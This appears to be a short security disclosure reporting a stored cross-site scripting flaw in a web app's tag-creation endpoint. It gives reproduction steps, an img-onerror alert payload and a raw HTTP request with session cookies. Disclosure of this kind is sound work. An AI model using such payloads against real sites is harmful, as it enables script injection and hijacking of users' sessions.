There is an XSS vulnerability when creating a new TAG
1. Click the settings icon and then click the add button
2. Enter Payload <img/src=x οnerrοr=alert(1)>
3. XSS vulnerability is triggered when the user opens the main page
Request package
POST /cynthia_war/tag/modifyTag.do HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-XSRF-TOKEN: null
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/cynthia_war/
Cookie: JSESSIONID=DB8D578A89284C827BA80ABF29625086; UM_distinctid=17a9eb31a96183-07b3b6c79b0a8a8-445567-1fa400-17a9eb31a971b3; CNZZDATA5537061=cnzz_eid%3D258761960-1626155220-%26ntime%3D1636450579; webRootDir="http://localhost:8080/cynthia_war/"; displayTagDiv=true; login_username=admin; login_password=21232f297a57a5a743894a0e4a801fc3; userId=""; login_nickname=admin
tagId=109&tagName=<img/src=x%20onerror=alert(1)>&tagColor=%23990000
中国移动通信集团广西有限公司